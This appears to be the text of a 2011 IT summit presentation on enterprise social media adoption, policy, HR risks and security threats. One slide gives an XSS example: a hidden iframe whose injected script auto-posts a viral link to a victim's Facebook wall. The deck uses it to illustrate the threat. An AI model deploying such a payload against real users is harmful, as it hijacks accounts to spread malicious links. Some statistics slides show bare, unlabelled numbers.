social media: infiltrating the enterprise

SOCIAL MEDIA:���INFILTRATING THE

ENTERPRISE

MIDTECH IT Summit June 27th, 2011

JAY A. MCLAUGHLIN, CISSP SVP, CHIEF INFORMATION OFFICER

DISCLAIMER The materials, thoughts, comments, ideas and opinions expressed throughout this presentation are entirely my own and do not necessarily represent the thoughts or

opinions of my employer (past or present).

AGENDA

•  Defining social media •  Embracing the Inevitable •  Understanding the Benefits & Risks •  Friending your Customers •  Preventing social media disasters •  Building a strategy

: forms of electronic communication (as Web sites for social networking and microblogging) through which users create online communities to share information, ideas, personal messages, and other content

Social media is media for social interaction using highly accessible and scalable communication techniques. Social media is the use of web-based and mobile technologies to turn communication into interactive dialogue.

What is Social Media?

•  500 Million •  250 Million •  700 Billion

Source: Facebook.com April 2011

It’s Corporate

•  6939 •  319 •  140 Million

Source: Twitter. com March 2011

It’s Mainstream

•  100 Million •  2 Million •  4.3 Billion

Source: LinkedIn.com May 2011

WHY SHOULD WE CARE?

• It's where your customers are

• It's where your prospects are

• It's reach stretches further broader than any marketing channel

• It's relevant to be in the game

“We don’t have a choice on whether we will DO

social media, the question is how WELL we DO it.”

- Erik Qualman, Author Socialnomics

http://www.youtube.com/user/Socialnomics09?blend=1&ob=5

Source: eMarketer, Nov 2010

* companies that have 100 or more employees

BUSINESS BENEFITS

Enhanced Collaboration

Shared Workspaces

Faster access to Information

Extended Organizational Reach

Ability to Compete

THE EQUALIZER

• When leveraged effectively, social networks become an equalizer, leveling the playing field

• It allows organizations both large and small to compete and be relevant in their space

• Ability to influence with little or not cost

UNANTICIPATED DISASTERS

PREVENTING DISASTERS

IS YOUR ORGANIZATION PREPARED FOR...?

• Employees posting opinions about the organization

• Managing brand reputation and public opinion/

exposure

• Responding to positive and negative feedback from

customers

• Standing by the decision NOT to get engaged....?

SOCIAL MEDIA SWOT

•  Strength - ability to build relationships with your target audience like never before.

• Weakness - silo-ed as a business function and not integrated in overall business strategy.

• Threat - fear of losing control. Seeks risk aversion. Non-innovative.

• Opportunities - its where our customers are. Integration with the business is key.

ESTABLISHING A POLICY

?

THE BASICS • Do your employees know what is acceptable or permitted?

• How may (or not) employees identify themselves?

• To what degree can corporate content be used?

• Has your organization determined what is can do with information obtained through social media?

"  Establishing a policy is critical!

• Governance required implement and enforce acceptable usage policy covering social networking sites

• It is key that all staff receive security awareness training covering your acceptable usage policy for social networking

• Promote good practices to help improve users behavior ultimately reducing and/or mitigating some of the risks

• Permit access only to social networking sites that have obvious business benefits only to users with a business need

ESTABLISH A STRATEGY

• Institute processes to manage and monitor activity

• Be flexible - overall uncertainty about what strategies and tactics to adopt to security social media

• Understand and identify which users create the most amount of risk?

• Create reasonable guidelines that can be followed

• Review sites terms and conditions to understand risks associated with each site

ESTABLISH A STRATEGY

REGULATION is coming

For regulated industries, what requirements do you face?

ex. FINRA

Employers know ALOT about their employees/candidates

• HR is tempted to“peak” at these sites to gather information about employees and potential candidates

• Consider discrimination lawsuits! Proceed with caution. - ex: viewing the online photo/picture of a candidate

• Consistency is KING - it will minimize your risk.

- ex: if conducting a search for ONE candidate, then do so for ALL

• Even if employers have the technical capability to gain access to social networking information of their employees or candidates, it does not imply the legal right to do so.

HR: OBTAINING INFORMATION FROM SOCIAL NETWORKS

consider ALL risks

Is there a need to address how to evaluate the risk of sharing too much information online in relation to the

value it brings to the business?

• There is a continued growth in social networking sites being used as an attack distribution platform

• Users are less likely to see malware when it is passed on by a friend as it has a certain level of authenticity and a level of trust

• Social networks give attackers a potentially powerful point of leverage, sometimes allowing them to launch sophisticated attacks against businesses

• Known weaknesses exist in the security of the networks themselves, which limit our control

Security Concerns

•  Session-hijacking / authentication weaknesses

•  Profile harvesting leading to social engineering -  ex: phishing / spear-phishing

•  Cross-site scripting (XSS) / Cross-site request forgery

(CSRF)

•  Malicious code / Malware -  ex: drive-by downloads

“Threatscape” of sites

<iframe id=”CrazyDaVinci” style=”display:none;” src=”http://m.facebook.com/connect/prompt_feed.php?display=wap&user_message_prompt=’<script>window.onload=function(){document.forms[0].message.value=’Just visited http://y.ahoo.it/gajeBA Wow.. cool! nice page dude!!!‘;document.forms[0].submit();}</script>”></iframe>

• this bit of HTML/Javascript would be included in a viral page. • the code sets the content of the wall post to a message that includes a link to a viral page, then submits the prompt automatically.

XSS Example

Microsoft has documented a steady rise in the number of attacks targeting social networks

Primary vectors:

• Phishing attempts

• Social engineering tactics Instances of Phishing impressions increased from 8.3% to 84.5%

Verizon highlighted in its 2011 DBIR, that malware and social engineering to have been the culprit for 60% of all reported attacks/breaches

Contribution of malware:

• 49% of breaches

• 79% of records stolen

PROTECT & SERVE

Policing Social Media: How do we protect the usage of social networks?

•  Is it possible to establish and implement a standard set of guidelines for enterprise users?

•  ...that would help to not only prevent data leaks, but

also keep emerging social networking malware at bay?

•  It requires a combination of technical, behavioral and organizational security controls

“Policing” Social Media

• Social media isn’t a choice anyone….recognize it is a business transformation tool • Perform a comprehensive risk assessment against all

social networks that will be considered for use

• Social networks DO introduce new security risks - take a formal approach to mitigate them through policy enforcement and user education • Doing nothing is not an option...will you take that

risk?

CONCLUSION

QUESTIONS?

@jaymclaughlin

linkedin.com/jaymclaughlin

Contact Info: